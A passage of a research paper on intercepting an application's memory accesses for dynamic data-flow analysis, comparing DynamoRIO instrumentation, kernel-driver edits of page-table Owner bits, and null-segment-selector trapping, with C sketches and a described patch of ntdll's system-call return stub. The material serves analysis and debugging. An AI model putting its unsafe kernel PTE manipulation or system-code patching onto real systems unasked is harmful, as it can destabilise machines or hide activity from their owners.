manner that +makes it possible to intercept instructions that read from or write to memory. +Two well-known examples of DBI implementations that the author is familiar +with are DynamoRIO and Valgrind[3, 11]. 
The second strategy that will be +discussed involves using the hardware paging features of the x86 and x64 +architectures to trap and handle access to specific pages in memory. Finally, +the third strategy makes use of the segmentation features included in the x86 +architecture to trap memory accesses by making use of the null selector. +Though these three strategies vary greatly, they all accomplish the same goal +of being able to intercept memory accesses within an application as it +executes. + +The ability to intercept memory reads and writes during runtime can support +research in additional areas relating to dynamic data flow analysis. For +example, the ability to track what areas of code are reading from and writing +to memory could make it possible to build a model for the data propagation +behaviors of an application. Furthermore, it might be possible to show with +what degree of code-level isolation different areas of memory are accessed. +Indeed, it may also be possible to attempt to validate the data consistency +model of a threaded application by investigating the access behaviors of +various regions of memory which are referenced by multiple threads. These are +but a few of the many potential candidates for dynamic data flow analysis. + +This paper is organized into three sections. Section 2 gives an introduction +to three different strategies for facilitating dynamic data flow analysis. +Section 3 enumerates some of the potential scenarios in which these strategies +could be applied in order to render some useful information about the data +flow behavior of an application. Finally, section 4 describes some of the +previous work whose concepts have been used as the basis for the research +described herein. + +2) Strategies + +This section describes three strategies that can be used to intercept runtime +memory accesses. The strategies described herein do not rely on any static +binary analysis. Techniques that do make use of static binary analysis are +outside of the scope of this paper. + +2.1) Dynamic Binary Instrumentation + +Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of +a binary application at runtime through the injection of instrumentation code. +This instrumentation code executes as part of the normal instruction stream +after being injected. In most cases, the instrumentation code will be +entirely transparent to the application that it's been injected to. Analyzing +an application at runtime makes it possible to gain insight into the behavior +and state of an application at various points in execution. This highlights +one of the key differences between static binary analysis and dynamic binary +analysis. Rather than considering what may occur, dynamic binary analysis has +the benefit of operating on what actually does occur. This is by no means +exhaustive in terms of exercising all code paths in the application, but it +makes up for this by providing detailed insight into an application's concrete +execution state. + +The benefits of DBI have made it possible to develop some incredibly advanced +tools. Examples where DBI might be used include runtime profiling, +visualization, and optimization tools. DBI implementations generally fall +into two categories: light-weight or heavy-weight. A light-weight DBI +operates on the architecture-specific instruction stream and state when +performing analysis. A heavy-weight DBI operates on an abstract form of the +instruction stream and state. 
An example of a heavy-weight DBI is Valgrind, which performs analysis on an
+intermediate representation of the machine state[11, 7]. An example of a
+light-weight DBI is DynamoRIO, which performs analysis using the
+architecture-specific state[3]. The benefit of a heavy-weight DBI over a
+light-weight DBI is that analysis code written against the intermediate
+representation is immediately portable to other architectures, whereas
+light-weight DBI analysis implementations must be fine-tuned to work with
+individual architectures. While Valgrind is a novel and interesting
+implementation, it is currently not supported on Windows. For this reason,
+attention will be given to DynamoRIO for the remainder of this paper. There
+are many additional DBI frameworks and details, but for the sake of limiting
+scope these will not be discussed. The reader should consult reference
+material to learn more about this subject[11].
+
+DynamoRIO is an example of a DBI framework that allows custom instrumentation
+code to be integrated in the form of dynamic libraries. The tool itself is a
+combination of Dynamo, a dynamic optimization engine developed by researchers
+at HP, and RIO, a runtime introspection and optimization engine developed by
+MIT. The fine-grained details of the implementation of DynamoRIO are outside
+of the scope of this paper, but it's important to understand the basic
+concepts[2].
+
+At a high level, figure 1 from Transparent Dynamic Optimization provides a
+great visualization of the process employed by Dynamo[2]. In concrete terms,
+Dynamo works by processing an instruction stream as it executes. To
+accomplish this, Dynamo assumes responsibility for the execution of the
+instruction stream. It uses a disassembler to identify the point of the next
+branch instruction in the code that is about to be executed. The set of
+instructions disassembled is referred to as a fragment (although it's more
+commonly known as a basic block). If the target of the branch instruction is
+in Dynamo's fragment cache, it executes the (potentially optimized) code in
+the fragment cache. When this code completes, it returns control to Dynamo to
+disassemble the next fragment. If at some point Dynamo encounters a branch
+target that is not in its fragment cache, it will add it to the fragment cache
+and potentially optimize it. This is the perfect opportunity for
+instrumentation code to be injected into the optimized fragment that is
+generated for a branch target. Injecting instrumentation code at this level
+is entirely transparent to the application. While this is an
+oversimplification of the process used by DynamoRIO, it should at least give
+some insight into how it functions.
+
+One of the best features of DynamoRIO from an analysis standpoint is that it
+provides a framework for inserting instrumentation code at the time that a
+fragment is being inserted into the fragment cache. This is especially useful
+for the purposes of intercepting memory accesses within an application. When
+a fragment is being created, DynamoRIO provides analysis libraries with the
+instructions that are to be included in the fragment that is generated. To
+optimize for performance, DynamoRIO provides multiple levels of disassembly
+information. At the most optimized level, only very basic information
+about the instructions is provided. At the least optimized level, very
+detailed information about the instructions and their operands can be
+obtained.
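+
+Jumping ahead slightly to the design and implementation discussion below, a
+minimal analysis library built on this fragment-creation hook might look
+something like the following sketch. It is only a sketch: the callback name
+dynamorio_basic_block and the INSTR_CREATE_add/instrlist_meta_preinsert
+macros are taken from the text, but the helpers used to walk the instruction
+list and test for memory operands (instrlist_first, instr_get_next,
+instr_reads_memory, instr_writes_memory) and the operand macros are
+assumptions about the DynamoRIO client API, whose exact names and signatures
+have varied between releases.
+
+/*
+ * Sketch of an analysis library callback that counts memory references by
+ * injecting an inline "add" ahead of every instruction that reads from or
+ * writes to memory.  Helper names are assumptions; see the note above.
+ */
+#include "dr_api.h"  /* assumed DynamoRIO client header */
+
+static unsigned int mem_ref_count;  /* bumped by the injected code */
+
+void dynamorio_basic_block(void *drcontext, app_pc tag, instrlist_t *bb)
+{
+    instr_t *instr;
+
+    for (instr = instrlist_first(bb); instr != NULL;
+         instr = instr_get_next(instr)) {
+
+        /* skip instructions with no explicit memory operands */
+        if (!instr_reads_memory(instr) && !instr_writes_memory(instr))
+            continue;
+
+        /* inject "add [&mem_ref_count], 1" prior to the instruction; a
+         * real client would instead materialize the effective address and
+         * pass it to an instrumentation function */
+        instrlist_meta_preinsert(bb, instr,
+            INSTR_CREATE_add(drcontext,
+                OPND_CREATE_ABSMEM(&mem_ref_count, OPSZ_4),
+                OPND_CREATE_INT8(1)));
+    }
+}
+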
Analysis libraries are free to control the level of information
+that they retrieve. Using this knowledge of DynamoRIO, it is now possible to
+consider how one might design an analysis library that is able to intercept
+memory reads and writes while an application is executing.
+
+2.1.1) Design
+
+DBI, and DynamoRIO in particular, makes designing a solution that can
+intercept memory reads and writes fairly trivial. The basic design involves
+having an analysis library that scans the instructions within a fragment that
+is being created. When an instruction that accesses memory is encountered,
+instrumentation code can be inserted prior to the instruction. The
+instrumentation code can be composed of instructions that notify an
+instrumentation function of the memory operand that is about to be read from
+or written to. This has the effect of causing the instrumentation function to
+be called when the fragment is executed. These few steps are really all that
+it takes to instrument the memory access behavior of an application as it
+executes using DynamoRIO.
+
+2.1.2) Implementation
+
+The implementation of the DBI approach is really just as easy as the design
+description makes it sound. To cooperate with DynamoRIO, an analysis library
+must implement a well-defined routine named dynamorio_basic_block which is
+called by DynamoRIO when a fragment is being created. This routine is passed
+an instruction list which contains the set of instructions taken from the
+native binary. Using this instruction list, the analysis library can make a
+determination as to whether or not any of the operands of an instruction
+either explicitly or implicitly reference memory. If an instruction does
+access memory, then instrumentation code must be inserted.
+
+Inserting instrumentation code with DynamoRIO is a pretty painless process.
+DynamoRIO provides a number of macros that encapsulate the process of creating
+and inserting instructions into the instruction list. For example,
+INSTR_CREATE_add will create an add instruction with a specific set of
+arguments and instrlist_meta_preinsert will insert an instruction prior to
+another instruction within the instruction list.
+
+A proof of concept implementation is included with the source code provided
+along with this paper.
+
+2.1.3) Considerations
+
+This approach is particularly elegant thanks to the concepts of dynamic binary
+instrumentation and to DynamoRIO itself for providing a framework that
+supports inserting instrumentation code into the fragment cache. Since
+DynamoRIO is explicitly designed to be a runtime optimization engine, the fact
+that the instrumentation code is cached within the fragment cache means that
+it gains the benefits of DynamoRIO's fragment optimization algorithms. When
+compared to alternative approaches, this approach also has significantly less
+overhead once the fragment cache becomes populated. This is because all of
+the instrumentation code is placed entirely inline with the application code
+that is executing rather than having to rely on alternative means of
+interrupting the normal course of program execution. Still, this approach is
+not without its set of considerations. Some of these considerations are
+described below:
+
+  1. Requires the use of a disassembler
+     DynamoRIO depends on its own internal disassembler. This can be a source
+     of problems and limitations.
+
+  2. Self-modifying and dynamic code
+     Self-modifying and dynamically generated code can potentially cause
+     problems with DynamoRIO.
+ + 3. DynamoRIO is closed source + While this has nothing to do with the actual concept, the fact that + DynamoRIO is closed source can be limiting in the event that there are + issues with DynamoRIO itself. + +2.2) Page Access Interception + +The hardware paging features of the x86 and x64 architectures represent a +potentially useful means of obtaining information about the memory access +behavior of an application. This is especially true due to the well-defined +actions that the processor takes when a reference is made to a linear address +whose physical page is either not present or has had its access restricted. +In these cases, the processor will assert the page fault interrupt (0x0E) and +thereby force the operating system to attempt to gracefully handle the virtual +memory reference. In Windows, the page fault interrupt is handled by +nt!KiTrap0E. In most cases, nt!KiTrap0E will issue a call into +nt!MmAccessFault which is responsible for making a determination about the +nature of the memory reference that occurred. If the memory reference fault +was a result of an access restriction, nt!MmAccessFault will return an access +violation error code (0xC0000005). When an access violation occurs, an +exception record is generated by the kernel and is then passed to either the +user-mode exception dispatcher or the kernel-mode exception dispatcher +depending on which mode the memory access occurred in. The job of the +exception dispatcher is to give a thread an opportunity to gracefully recover +from the exception. This is accomplished by providing each of the registered +or vectored exception handlers with the exception information that was +collected when the page fault occurred. If an exception handler is able to +recover, execution of the thread can simply restart where it left off. Using +the principles outlined above, it is possible to design a system that is +capable of both trapping and handling memory references to specific pages in +memory during the course of normal process execution. + +2.2.1) Design + +The first step that must be taken to implement this system involves +identifying a method that can be used to trap references to arbitrary pages in +memory. Fortunately, previous work has done much to identify some of the +different approaches that can be taken to accomplish this[8, 4]. For the purposes +of this paper, one of the most useful approaches centers around the ability to +define whether or not a page is restricted from user-mode access. This is +controlled by the Owner bit in a linear address' page table entry (PTE)[5]. When +the Owner bit is set to 0, the page can only be accessed at privilege level 0. +This effectively restricts access to kernel-mode in all modern operating +systems. Likewise, when the Owner bit is set to 1, the page can be accessed +from all privilege levels. By toggling the Owner bit to 0 in the PTEs +associated with a given set of linear addresses, it is possible to trap all +user-mode references to those addresses at runtime. This effectively solves +the first hurdle in implementing a solution to intercept memory access +behavior. + +Using the approach outlined above, any reference that is made from user-mode +to a linear address whose PTE has had the Owner bit set to 0 will result in an +access violation exception being passed to the user-mode exception dispatcher. 
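+
+To give a rough idea of what this PTE manipulation might look like, the
+following kernel-mode sketch clears the Owner bit for every page backing a
+user-mode region. It is illustrative only: it assumes a 32-bit, non-PAE
+system with the classic 0xC0000000 PTE self-map, performs no PTE locking (as
+the considerations at the end of this section point out, such locking is not
+available to third-party drivers), and ignores multiprocessor TLB shootdown.
+
+/*
+ * Illustrative sketch (32-bit, non-PAE): clear the Owner (user/supervisor)
+ * bit of every PTE backing a user-mode region so that user-mode references
+ * to the region fault.  Not safe as-is; no PTE locking is performed.
+ */
+#include <ntddk.h>
+
+#define PTE_BASE   0xC0000000
+#define PTE_OWNER  0x00000004    /* U/S bit of a non-PAE x86 PTE */
+
+static PULONG PteForVa(PVOID Va)
+{
+    return (PULONG)(PTE_BASE + (((ULONG_PTR)Va >> 12) * sizeof(ULONG)));
+}
+
+VOID RestrictRegionToKernel(PVOID Base, SIZE_T Length)
+{
+    PUCHAR Va  = (PUCHAR)PAGE_ALIGN(Base);
+    PUCHAR End = (PUCHAR)Base + Length;
+
+    for (; Va < End; Va += PAGE_SIZE) {
+        PULONG Pte = PteForVa(Va);
+
+        *Pte &= ~PTE_OWNER;   /* user-mode access to this page now faults */
+    }
+
+    /* the TLB entries covering the region must also be invalidated on all
+     * processors before the change is reliably visible; omitted here */
+}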
+
+This exception must be handled by a custom exception handler that is able to
+distinguish transient access violations from ones that occurred as a result of
+the Owner bit having been modified. This custom exception handler must also
+be able to recover from the exception in a manner that allows execution to
+resume seamlessly. Distinguishing exceptions is easy if one assumes that the
+custom exception handler has knowledge in advance of the address regions that
+have had their Owner bit modified. Given this assumption, the act of
+distinguishing exceptions is as simple as seeing if the fault address is
+within an address region that is currently being monitored. While
+distinguishing exceptions may be easy, being able to gracefully recover is an
+entirely different matter.
+
+To recover and resume execution with no noticeable impact on an application
+means that the exception handler must have a mechanism that allows the
+application to access the data stored in the pages whose virtual mappings have
+had their access restricted to kernel-mode. This, of course, would imply that
+the application must have some way, either direct or indirect, to access the
+contents of the physical pages associated with the virtual mappings that have
+had their PTEs modified. The most obvious approach would be to simply toggle
+the Owner bit to permit user-mode access. This has many different problems,
+not the least of which is that doing so would be expensive and would not
+behave properly in multi-threaded environments (memory accesses could be
+missed or worse). An alternative to updating the Owner bit would be to have a
+device driver designed to provide support to processes that would allow them
+to read the contents of a virtual address at privilege level 0. However,
+having the ability to read and write memory through a driver means nothing if
+the results of the operation cannot be factored back into the instruction that
+triggered the exception.
+
+Rather than attempting to emulate the read and write access, a better approach
+can be used. This approach involves creating a second virtual mapping to the
+same set of physical pages described by the linear addresses whose PTEs were
+modified. This second virtual mapping would behave like a typical user-mode
+memory mapping. In this way, the process' virtual address space would contain
+two virtual mappings to the same set of physical pages. One mapping, which
+will be referred to as the original mapping, would represent the user-mode
+inaccessible set of virtual addresses. The second mapping, which will be
+referred to as the mirrored mapping, would be the user-mode accessible set of
+virtual addresses. By mapping the same set of physical pages at two
+locations, it is possible to transparently redirect address references at the
+time that exceptions occur. An important thing to note is that in order to
+provide support for mirroring, a disassembler must be used to figure out which
+registers need to be modified.
+
+To better understand how this could work, consider a scenario where an
+application contains a mov [eax], 0x1 instruction. For the purposes of this
+example, assume that the eax register contains an address that is within the
+original mapping as described above. When this instruction executes, it will
+lead to an access violation exception being generated as a result of the PTE
+modifications that were made to the original mapping.
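+
+The exception handler logic that the next few paragraphs walk through might
+be sketched roughly as follows. This is a simplified illustration rather than
+the implementation that accompanies the paper: it hardcodes the eax register
+from this example instead of disassembling the faulting instruction, and the
+orig_base, mirror_base, and region_size variables are assumed to have been
+populated when the mirrored mapping was created.
+
+/*
+ * Simplified vectored exception handler for the "mov [eax], 0x1" example.
+ * A complete handler must disassemble the faulting instruction to learn
+ * which register produced the faulting address; eax is assumed here.
+ */
+#include <windows.h>
+
+static ULONG_PTR orig_base, mirror_base;   /* assumed: set up elsewhere */
+static SIZE_T    region_size;
+static ULONG_PTR saved_eax;
+static BOOL      mirroring;
+
+static LONG CALLBACK MirrorHandler(PEXCEPTION_POINTERS xi)
+{
+    PEXCEPTION_RECORD rec = xi->ExceptionRecord;
+    PCONTEXT          ctx = xi->ContextRecord;
+
+    if (rec->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
+        ULONG_PTR fault = rec->ExceptionInformation[1];
+
+        if (fault >= orig_base && fault < orig_base + region_size) {
+            saved_eax = ctx->Eax;              /* remember the original */
+            ctx->Eax  = mirror_base + (fault - orig_base);
+            ctx->EFlags |= 0x100;              /* trap flag: single step */
+            mirroring = TRUE;
+            return EXCEPTION_CONTINUE_EXECUTION;
+        }
+    } else if (rec->ExceptionCode == EXCEPTION_SINGLE_STEP && mirroring) {
+        ctx->Eax  = saved_eax;                 /* restore the register */
+        mirroring = FALSE;
+        return EXCEPTION_CONTINUE_EXECUTION;
+    }
+
+    return EXCEPTION_CONTINUE_SEARCH;
+}
+
+/* registered once at startup: AddVectoredExceptionHandler(1, MirrorHandler); */
+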
When the exception handler inspects this exception, it can determine that the
+fault address was one that is contained within the original mapping. To allow
+execution to resume, the exception handler must update the eax register to
+point to the equivalent address within the mirrored region. Once it has
+altered the value of eax, the exception handler can tell the exception
+dispatcher to continue execution with the now-modified register information.
+From the perspective of an executing application, this entire operation will
+occur transparently. Unfortunately, there's still more work that needs to be
+done in order to ensure that the application continues to execute properly
+after the exception dispatcher continues execution.
+
+The biggest problem with modifying the value of a register to point to the
+mirrored address is that it can unintentionally alter the behavior of
+subsequent instructions. For example, the application may not function
+properly if it assumes that it can access other non-mirrored memory addresses
+relative to the address stored within eax. Not only that, but allowing eax to
+continue to hold the mirrored address will mean that subsequent reads and
+writes to memory made using the eax register will be missed for as long as
+eax contains the mirrored address.
+
+In order to solve this problem, it is necessary to come up with a method of
+restoring registers to their original value after the instruction executes.
+Fortunately, the underlying architecture has built-in support that allows a
+program to be notified after it has executed an instruction. This support is
+known as single-stepping. To make use of single-stepping, the exception
+handler can set the trap flag (0x100) in the saved value of the eflags
+register. When execution resumes, the processor will generate a single step
+exception after the original instruction executes. This will result in the
+custom exception handler being called. When this occurs, the custom exception
+handler can determine if the single step exception occurred as a result of a
+previous mirroring operation. If it was the result of a mirroring operation,
+the exception handler can take steps to restore the appropriate register to
+its original value.
+
+Using these four primary steps, a complete solution to the problem of
+intercepting memory accesses can be formed. First, the Owner bit of the PTEs
+associated with a region of virtual memory can be set to 0. This will cause
+user-mode references to this region to generate an access violation exception.
+Second, an additional mapping to the set of physical pages described by the
+original mapping can be created which is accessible from user-mode. Third,
+any access violation exceptions that reach the custom exception handler can be
+inspected. If they are the result of a reference to a region that is being
+tracked, the register contents of the thread context can be adjusted to
+reference the user-accessible mirrored mapping. The thread can then be
+single-stepped so that the fourth and final step can be taken. When a
+single-step exception is generated, the custom exception handler can restore
+the original value of the register that was modified. When this is complete,
+the thread can be allowed to continue as if nothing had happened.
+
+2.2.2) Implementation
+
+An implementation of this approach is included with the source code released
+along with this paper. This implementation has two main components: a
+kernel-mode driver and a user-mode DLL.
The kernel-mode driver provides a
+device object interface that allows a user-mode process to create a mirrored
+mapping of a set of physical pages and to toggle the Owner bit of PTEs
+associated with address regions. The user-mode DLL is responsible for
+implementing a vectored exception handler that takes care of processing access
+violation exceptions by mirroring the address references to the appropriate
+mirrored region. The user-mode DLL also exposes an API that allows
+applications to create a memory mirror. This abstracts the entire process and
+makes it simple to begin tracking a specific memory region. The API also
+allows applications to register callbacks that are notified when an address
+reference occurs. This allows further analysis of the memory access behavior
+of the application.
+
+2.2.3) Considerations
+
+While this approach is most definitely functional, it comes with a number of
+caveats that make it sub-optimal for any sort of large-scale deployment. The
+following considerations are by no means all-encompassing, but some of the
+more important ones have been enumerated below:
+
+  1. Unsafe modification of PTEs
+     It is not safe to modify PTEs without acquiring certain locks.
+     Unfortunately, these locks are not exported and are therefore
+     inaccessible to third-party drivers.
+
+  2. Large amount of overhead
+     The overhead associated with having to take a page fault and pass the
+     exception on to be handled in user-mode is substantial. Memory access
+     time with respect to the application could jump from nanoseconds to
+     microseconds or even milliseconds.
+
+  3. Requires the use of a disassembler
+     Since this approach relies on mirroring memory references from one
+     virtual address to another, a disassembler has to be used to figure out
+     which registers need to be modified with the mirrored address. Any time
+     a disassembler is needed is an indication that things are getting fairly
+     complicated.
+
+  4. Cannot track memory references to all addresses
+     The fact that this approach relies on locking physical pages prevents it
+     from feasibly tracking all memory references. In addition, because the
+     thread stack is required to be valid in order to dispatch exceptions,
+     it's not possible to track reads and writes to thread stacks using this
+     approach.
+
+2.3) Null Segment Interception
+
+Segmentation is an extremely old feature of the x86 architecture. Its purpose
+has been to provide software with the ability to partition the address space
+into distinct segments that can be referenced through a 16-bit segment
+selector. Segment selectors are used to index either the Global Descriptor
+Table (GDT) or the Local Descriptor Table (LDT). Segment descriptors convey
+information about all or a portion of the address space. On modern 32-bit
+operating systems, segmentation is used to set up a flat memory model
+(primarily only used because there is no way to disable it). This is further
+illustrated by the fact that the x64 architecture has effectively done away
+with the ES, DS, and SS segment registers in 64-bit mode. While segment
+selectors are primarily intended to make it possible to access memory, they
+can also be used to prevent access to it.
+
+2.3.1) Design
+
+Segmentation is one of the easiest ways to trap memory accesses. The majority
+of instructions which reference memory implicitly use either the DS or ES
+segment registers to do so. The one exception to this rule is instructions
+that deal with the stack.
These instructions implicitly use the SS segment
+register. There are a few different ways one can go about causing a general
+protection fault when accessing an address relative to a segment selector, but
+one of the easiest is to take advantage of the null selector. The null
+selector, 0x0, is a special segment selector that will always cause a general
+protection fault when it is used to reference memory. By loading the null
+selector into DS, for example, the mov [eax], 0x1 instruction would cause a
+general protection fault when executed. Using the null selector solves the
+problem of being able to intercept memory accesses, but there still needs to
+be some mechanism to allow the application to execute normally after
+intercepting the memory access.
+
+When a general protection fault occurs in user-mode, the kernel generates an
+access violation exception and passes it off to the user-mode exception
+dispatcher in much the same way as was described in 2.2. Registering a custom
+exception handler makes it possible to catch this exception and handle it
+gracefully. To handle this exception, the custom exception handler must
+restore the DS and ES segment registers to valid segment selectors by updating
+the thread context record associated with the exception. On 32-bit versions
+of Windows, the segment registers should be restored to 0x23. Once the
+segment registers have been updated, the exception dispatcher can be told to
+continue execution. However, before this happens, there is an additional step
+that must be taken.
+
+It is not enough to simply restore the segment registers and then continue
+execution. This would lead to subsequent reads and writes being missed as a
+result of the DS and ES segment registers no longer pointing to the null
+selector. To address this, the custom exception handler should toggle the
+trap flag in the context record prior to continuing execution. Setting the
+trap flag will cause the processor to generate a single step exception after
+the instruction that generated the general protection fault executes. This
+single step exception can then be processed by the custom exception handler to
+reset the DS and ES segment registers to the null selector. After the segment
+registers have been updated, the trap flag can be disabled and execution can
+be allowed to continue. By following these steps, the application is able to
+make forward progress while also making it possible to trap all memory reads
+and writes that use the DS and ES segment registers.
+
+2.3.2) Implementation
+
+The implementation for this approach involves registering a vectored exception
+handler that is able to handle the access violation and single step exceptions
+that are generated. Since this approach relies on setting the segment
+registers DS and ES to the null selector, an implementation must take steps to
+update the segment register state for each running thread in a process and for
+all new threads as they are created. Updating the segment register state for
+running threads involves enumerating the running threads in the calling
+process using the toolhelp library. For each thread that is not the calling
+thread, the SetThreadContext routine can be used to update segment registers.
+The calling thread can update the segment registers using native instructions.
+To alter the segment registers for new threads, the DLL_THREAD_ATTACH
+notification can be used, as sketched below.
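+
+A rough sketch of this thread bookkeeping is shown below. It relies only on
+documented APIs (the toolhelp snapshot routines and Get/SetThreadContext);
+suspending each thread around the context update is an added precaution
+rather than something prescribed by the implementation described above, and
+error handling is omitted for brevity.
+
+/*
+ * Sketch: load the null selector into DS and ES for every thread in the
+ * process.  Other threads are updated through SetThreadContext; the
+ * calling thread updates its own registers with inline assembly.
+ */
+#include <windows.h>
+#include <tlhelp32.h>
+
+static void NullSegmentsForAllThreads(void)
+{
+    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
+    THREADENTRY32 te = { sizeof(te) };
+    DWORD pid = GetCurrentProcessId();
+    DWORD self = GetCurrentThreadId();
+    HANDLE thread;
+    CONTEXT ctx;
+
+    if (Thread32First(snap, &te)) {
+        do {
+            if (te.th32OwnerProcessID != pid || te.th32ThreadID == self)
+                continue;
+
+            thread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT |
+                                THREAD_SET_CONTEXT, FALSE, te.th32ThreadID);
+            if (thread == NULL)
+                continue;
+
+            SuspendThread(thread);
+            ctx.ContextFlags = CONTEXT_SEGMENTS;
+            GetThreadContext(thread, &ctx);
+            ctx.SegDs = 0;                      /* null selector */
+            ctx.SegEs = 0;
+            SetThreadContext(thread, &ctx);
+            ResumeThread(thread);
+            CloseHandle(thread);
+        } while (Thread32Next(snap, &te));
+    }
+    CloseHandle(snap);
+
+    /* the calling thread can simply load the null selector directly */
+    __asm {
+        xor eax, eax
+        mov ds, ax
+        mov es, ax
+    }
+}
+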
Once all threads have had their DS and ES segment registers +updated, memory references will immediately begin causing access violation +exceptions. + +When these access violation exceptions are passed to the vectored exception +handler, appropriate steps must be taken to restore the DS and ES segment +registers to a valid segment selector, such as 0x23. This is accomplished by +updating the SegDs and SegEs segment registers in the CONTEXT structure that +is passed in association with an exception. In addition to updating these +segment registers, the trap flag (0x100) must also be set in the EFlags +register so that the DS and ES segment registers can be restored to the null +selector in order to trap subsequent memory accesses. Setting the trap flag +will lead to a single step exception after the instruction that generated the +access violation executes. When the single step exception is received, the +SegDs and SegEs segment registers can be restored to the null selector. + +These few steps capture the majority of the implementation, but there is a +specific Windows nuance that must be handled in order for this to work right. +When the Windows kernel returns to a user-mode process after a system call has +completed, it restores the DS and ES segment selectors to their normal value +of 0x23. The problem with this is that without some way to reset the segment +registers to the null selector after a system call returns, there is no way to +continue to track memory accesses after a system call. Fortunately, there is +a relatively painless way to reset the segment registers after a system call +returns. On Windows XP SP2 and more recent versions of Windows, the kernel +determines where to transfer control to after a system call returns by looking +at the function pointer stored in the shared user data memory mapping. +Specifically, the SystemCallReturn attribute at 0x7ffe0304 holds a pointer to +a location in ntdll that typically contains just a ret instruction as shown +below: + +0:001> u poi(0x7ffe0304) +ntdll!KiFastSystemCallRet: +7c90eb94 c3 ret +7c90eb95 8da42400000000 lea esp,[esp] +7c90eb9c 8d642400 lea esp,[esp] + +Replacing this single ret instruction with code that resets the DS and ES +registers to the null selector followed by a ret instruction is enough to make +it possible to continue to trap memory accesses after a system call returns. +However, this replacement code should not take these steps if a system call +occurs in the context of the exception dispatcher, as this could lead to a +nesting issue if anything in the exception dispatcher references memory, which +is very likely. + +An implementation of this approach is included with the source code provided +along with this paper. + +2.3.3) Considerations + +There are a few considerations that should be noted about this approach. On +the positive side, this approach is unique when compared to the others +described in this paper due to the fact that, in principle, it should be +possible to use it to trap memory accesses in kernel-mode, although it is +expected that the implementation may be much more complicated. This approach +is also much simpler than the other approaches in that it requires far less +code. While these are all good things, there are some negative considerations +that should also be pointed out. These are enumerated below: + + 1. 
Will not work on x64
+     The segmentation approach described in this section will not work on x64
+     due to the fact that the DS, ES, and even SS segment selectors are
+     effectively ignored when the processor is in 64-bit mode.
+
+  2. Significant performance overhead
+     Like many of the other approaches, this one also suffers from significant
+     performance overhead involved in having to take a GP and a DB fault for
+     every address reference. This approach could be further optimized by
+     creating a custom LDT entry (using NtSetLdtEntries) that describes a
+     region whose base address is 0 and length is n, where n is just below the
+     address of the region(s) that should be monitored. This would have the
+     effect of allowing memory accesses to succeed within the lower portion of
+     the address space and fail in the higher portion (which is being
+     monitored). It's important to note that the base address of the LDT entry
+     must be zero. This is problematic since most of the regions that one
+     would like to monitor (heap) are allocated low in the address space. It
+     would be possible to work around this issue by having
+     NtAllocateVirtualMemory allocate using MEM_TOP_DOWN.
+
+  3. Requires a disassembler
+     Unfortunately, this approach also requires the use of a disassembler in
+     order to extract the effective address that caused the access violation
+     exception to occur. This is necessary because general protection faults
+     that occur due to a segment selector issue generate exception records that
+     flag the fault address as being 0xffffffff. This makes sense in the
+     context that without a valid segment selector, there is no way to
+     accurately calculate the effective address. The use of a disassembler
+     means that the code is inherently more complicated than it would otherwise
+     need to be. There may be some way to craft a special LDT entry that would
+     still make it possible to determine the address that caused the fault, but
+     the author has not investigated this.
+
+3) Potential Uses
+
+The ability to intercept an application's memory accesses is an interesting
+concept, but on its own it is of little use beyond simple statistical and
+visual analysis. Even though this is the case, the data that can be collected
+by analyzing memory access behavior can make it possible to perform much more
+extensive forms of dynamic binary analysis. This section will give a brief
+introduction to some of the hypothetical areas that might benefit from being
+able to understand the memory access behavior of an application.
+
+3.1) Data Propagation
+
+Being able to gain knowledge about the way that data propagates throughout an
+application can provide extremely useful insights. For example, understanding
+data propagation can give security researchers an idea of the areas of code
+that are affected, either directly or indirectly, by a buffer that is received
+from a network socket. In this context, having knowledge about areas affected
+by data would be much more valuable than simply understanding the code paths
+that are taken as a result of the buffer being received. Though the two may
+seem closely related, the areas of code affected by a buffer that is received
+should actually be restricted to a subset of the overall code paths taken.
+
+Even if understanding data propagation within an application is beneficial, it
+may not be clear exactly how analyzing memory access behavior could make this
+possible.
To understand how this might work, it's best to think of memory +access in terms of its two basic operations: read and write. In the course of +normal execution, any instruction that reads from a location in memory can be +said to be dependent on the last instruction that wrote to that location. +When an instruction writes to a location in memory, it can be said that any +instructions that originally wrote to that location no longer have claim over +it. Using these simple concepts, it is possible to build a dependency graph +that shows how areas of code become dependent on one another in terms of a +reader/writer relationship. This dependency graph would be dynamic and would +change as a program executes just the same as the data propagation within an +application would change. + +At this point in time, the author has developed a very simple implementation +based on the DBI strategy outlined in this paper. The current implementation +is in need of further refinement, but it is capable of showing reader/writer +relationships as the program executes. This area is ripe for future research. + +3.2) Memory Access Isolation + +From a visualization standpoint, it might be interesting to be able to show +with what degrees of code-level isolation different regions of memory are +accessed. For example, being able to show what areas of code touch individual +heap allocations could provide interesting insight into the containment model +of an application that is being analyzed. This type of analysis might be able +to show how well designed the application is by inferring code quality based +on the average number of areas of code that make direct reference to unique +heap allocations. Since this concept is a bit abstract, it might make sense +to discuss a more concrete example. + +One example might involve an object-oriented C++ application that contains +multiple classes such as Circle, Shape, Triangle, and so on. In the first +design, the application allows classes to directly access the attributes of +instances. In the second design, the application forces classes to reference +attributes through public getters and setters. Using memory access behavior +to identify code-level isolation, the first design might be seen as a poor +design due to the fact that there will be many code locations where unique +heap allocations (class instances) have the contents of their memory accessed +directly. The second design, on the other hand, might be seen as a more +robust design due to the fact that the unique heap allocations would be +accessed by fewer places (the getters and setters). + +It may actually be the case that there's no way to draw a meaningful +conclusion by analyzing code-level isolation of memory accesses. One specific +case that was raised to the author involved how the use of inlining or +aggressive compiler optimizations might incorrectly indicate a poor design. +Even though this is likely true, there may be some knowledge that can be +obtained by researching this further. The author is not presently aware of an +implementation of this concept but would love to be made aware if one exists. + +3.3) Thread Data Consistency + +Programmers familiar with the pains of thread deadlocks and thread-related +memory corruption should be well aware of how tedious these problems can be to +debug. By analyzing memory access behavior in conjunction with some +additional variables, it may be possible to make determinations as to whether +or not a memory operation is being made in a thread safe manner. 
